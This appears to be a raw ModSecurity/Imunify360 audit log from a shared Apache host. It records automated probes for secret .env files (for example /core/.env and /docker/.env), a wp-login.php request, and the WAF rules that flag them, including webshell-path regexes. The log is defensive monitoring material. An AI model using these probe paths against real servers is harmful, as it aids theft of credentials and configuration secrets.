"NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/hotels-bikaner.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281389321974 18411 (- - -) Stopwatch2: 1751281389321974 18411; combined=3337, p1=170, p2=2984, p3=0, p4=0, p5=183, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --649e5464-Z-- --cc876b23-A-- [30/Jun/2025:16:33:10.915579 +0530] aGJu7oU2EnuyYp1xkG2bQAAAAD4 192.253.209.66 32271 192.168.74.40 443 --cc876b23-B-- POST /.env.project%20 HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --cc876b23-C-- 0x%5B%5D=DTAB --cc876b23-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --cc876b23-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281390792113 124034 (- - -) Stopwatch2: 1751281390792113 124034; combined=9865, p1=164, p2=9297, p3=0, p4=0, p5=404, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --cc876b23-Z-- --61b90647-A-- [30/Jun/2025:16:33:11.721028 +0530] aGJu754tZwI9VhjyFFR7cgAAAEI 20.171.207.232 33346 192.168.74.40 443 --61b90647-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/Rajasthan-Folk-Dances.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --61b90647-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --61b90647-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/Rajasthan-Folk-Dances.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/Rajasthan-Folk-Dances.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --61b90647-Z-- --05f3864f-A-- [30/Jun/2025:16:33:12.570909 +0530] aGJu8N-HxfD8hNXwBpyI_AAAAGE 192.253.209.104 22295 192.168.74.40 443 --05f3864f-B-- GET /.env.dist HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept-Encoding: * Accept: */* Connection: keep-alive --05f3864f-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --05f3864f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281392522978 48270 (- - -) Stopwatch2: 1751281392522978 48270; combined=5605, p1=154, p2=5265, p3=0, p4=0, p5=185, sr=197, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --05f3864f-Z-- --736bfe1b-A-- [30/Jun/2025:16:33:12.883871 +0530] aGJu8J4tZwI9VhjyFFR7cwAAAEI 20.171.207.232 33346 192.168.74.40 443 --736bfe1b-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/Alwar-City-Guide.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --736bfe1b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --736bfe1b-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/Alwar-City-Guide.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/Alwar-City-Guide.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281392864834 19277 (- - -) Stopwatch2: 1751281392864834 19277; combined=4202, p1=198, p2=3832, p3=0, p4=0, p5=172, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --736bfe1b-Z-- --4abaf02c-A-- [30/Jun/2025:16:33:13.954418 +0530] aGJu8X2nhEobhD5c29xrVwAAAFo 192.253.209.88 10273 192.168.74.40 443 --4abaf02c-B-- POST /.env.dist HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --4abaf02c-C-- 0x%5B%5D=DTAB --4abaf02c-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --4abaf02c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281393827082 127784 (- - -) Stopwatch2: 1751281393827082 127784; combined=9961, p1=179, p2=9411, p3=0, p4=0, p5=370, sr=49, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4abaf02c-Z-- --11f8f669-A-- [30/Jun/2025:16:33:14.056074 +0530] aGJu8Rt271fKIIafbmUlhwAAAF8 43.154.140.188 38536 192.168.74.40 80 --11f8f669-B-- GET / HTTP/1.1 Host: infivislifecare.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --11f8f669-F-- HTTP/1.1 200 OK Last-Modified: Fri, 27 Sep 2024 11:37:35 GMT Accept-Ranges: bytes Content-Length: 49730 Connection: close -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --11f8f669-Z-- --53876e25-A-- [30/Jun/2025:16:33:15.114112 +0530] aGJu8_nNXpEUjiJVIlRmlAAAADo 192.253.209.62 21573 192.168.74.40 443 --53876e25-B-- GET /back/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --53876e25-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --53876e25-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281395047891 66917 (- - -) Stopwatch2: 1751281395047891 66917; combined=1129, p1=74, p2=792, p3=0, p4=0, p5=262, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --53876e25-Z-- --3dc68d48-A-- [30/Jun/2025:16:33:16.075130 +0530] aGJu8jSFvs-H_7nBXVD84QAAAEo 198.98.57.237 39569 192.168.74.40 443 --3dc68d48-B-- GET /wp-login.php HTTP/1.1 Host: mail.novemsol.com Connection: keep-alive Accept-Encoding: none Accept: */* user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36 --3dc68d48-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Set-Cookie: PHPSESSID=70d87f52993bfe3473d49c0c72ce9eba; path=/ Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3dc68d48-Z-- --4f6c325f-A-- [30/Jun/2025:16:33:16.562968 +0530] aGJu9H2nhEobhD5c29xrWAAAAFo 192.253.209.103 52875 192.168.74.40 443 --4f6c325f-B-- POST /back/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --4f6c325f-C-- 0x%5B%5D=DTAB --4f6c325f-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --4f6c325f-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281396484855 78511 (- - -) Stopwatch2: 1751281396484855 78511; combined=2078, p1=165, p2=1643, p3=0, p4=0, p5=270, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4f6c325f-Z-- --8b6cd545-A-- [30/Jun/2025:16:33:17.016415 +0530] aGJu9PnNXpEUjiJVIlRmlQAAADo 57.141.0.10 35598 192.168.74.40 443 --8b6cd545-B-- GET /rajasthan-tours-from-udaipur/rajasthan-tours-from-agra/rajasthan-tours-from-agra/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-jodhpur/rajasthan-tours-from-delhi/images/Rajasthan-Travel-Guides/Car-Rentals-Ahmedabad.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --8b6cd545-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8b6cd545-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-udaipur/rajasthan-tours-from-agra/rajasthan-tours-from-agra/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-jodhpur/rajasthan-tours-from-delhi/images/Rajasthan-Travel-Guides/Car-Rentals-Ahmedabad.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a77f3508-Z-- --7d1d4667-A-- [30/Jun/2025:16:33:18.183811 +0530] aGJu9ir_VjbCfxeXLc8cDQAAAE8 192.253.209.77 36939 192.168.74.40 443 --7d1d4667-B-- GET /core/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --7d1d4667-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --7d1d4667-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281398142392 41586 (- - -) Stopwatch2: 1751281398142392 41586; combined=955, p1=113, p2=641, p3=0, p4=0, p5=200, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --7d1d4667-Z-- --1a03e819-A-- [30/Jun/2025:16:33:18.918516 +0530] aGJu9p4tZwI9VhjyFFR7eAAAAEI 20.171.207.232 33346 192.168.74.40 443 --1a03e819-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/payment-mode.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --1a03e819-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --1a03e819-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/payment-mode.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/payment-mode.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281398901303 17497 (- - -) Stopwatch2: 1751281398901303 17497; combined=4295, p1=164, p2=3950, p3=0, p4=0, p5=180, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1a03e819-Z-- --1975d726-A-- [30/Jun/2025:16:33:19.603192 +0530] aGJu98AWx2r4bH3u7WHhNgAAAGM 192.253.209.56 21969 192.168.74.40 443 --1975d726-B-- POST /core/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --1975d726-C-- 0x%5B%5D=DTAB --1975d726-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --1975d726-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281399531093 73859 (- - -) Stopwatch2: 1751281399531093 73859; combined=1864, p1=149, p2=1373, p3=0, p4=0, p5=342, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1975d726-Z-- --6748784a-A-- [30/Jun/2025:16:33:20.069354 +0530] aGJu-J4tZwI9VhjyFFR7eQAAAEI 20.171.207.232 33346 192.168.74.40 443 --6748784a-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/js/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --6748784a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --6748784a-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/js/our-services.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --6748784a-Z-- --03c0a136-A-- [30/Jun/2025:16:33:20.777514 +0530] aGJu-Cr_VjbCfxeXLc8cDgAAAE8 192.253.209.58 41051 192.168.74.40 443 --03c0a136-B-- GET /docker/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --03c0a136-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --03c0a136-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281400737368 40570 (- - -) Stopwatch2: 1751281400737368 40570; combined=941, p1=96, p2=689, p3=0, p4=0, p5=156, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --03c0a136-Z-- --645cf616-A-- [30/Jun/2025:16:33:20.869229 +0530] aGJu-Bt271fKIIafbmUligAAAF8 57.141.0.29 55820 192.168.74.40 443 --645cf616-B-- GET /rajasthan-tours-from-delhi/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-delhi/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-udaipur/Rajasthan-Travel-Guides/images/Rajasthan-Travel-Guides/Map-of-Rajasthan.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --645cf616-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --645cf616-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-delhi/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-delhi/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-udaipur/Rajasthan-Travel-Guides/images/Rajasthan-Travel-Guides/Map-of-Rajasthan.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-delhi/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-delhi/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-udaipur/Rajasthan-Travel-Guides/images/Rajasthan-Travel-Guides/Map-of-Rajasthan.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-delhi/rajasthan-tours-from-ahmedabad||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281400851986 17398 (- - -) Stopwatch2: 1751281400851986 17398; combined=4294, p1=193, p2=3957, p3=0, p4=0, p5=143, sr=62, sw=1, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4fff0f6b-Z-- --ec0d354a-A-- [30/Jun/2025:16:33:22.311247 +0530] aGJu-mDWKeIK7PdN9mdsngAAAEU 192.253.209.77 48513 192.168.74.40 443 --ec0d354a-B-- POST /docker/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --ec0d354a-C-- 0x%5B%5D=DTAB --ec0d354a-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --ec0d354a-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281402170865 140730 (- - -) Stopwatch2: 1751281402170865 140730; combined=2120, p1=149, p2=1577, p3=0, p4=0, p5=394, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ec0d354a-Z-- --3e13bb32-A-- [30/Jun/2025:16:33:22.508602 +0530] aGJu-p4tZwI9VhjyFFR7ewAAAEI 20.171.207.232 33346 192.168.74.40 443 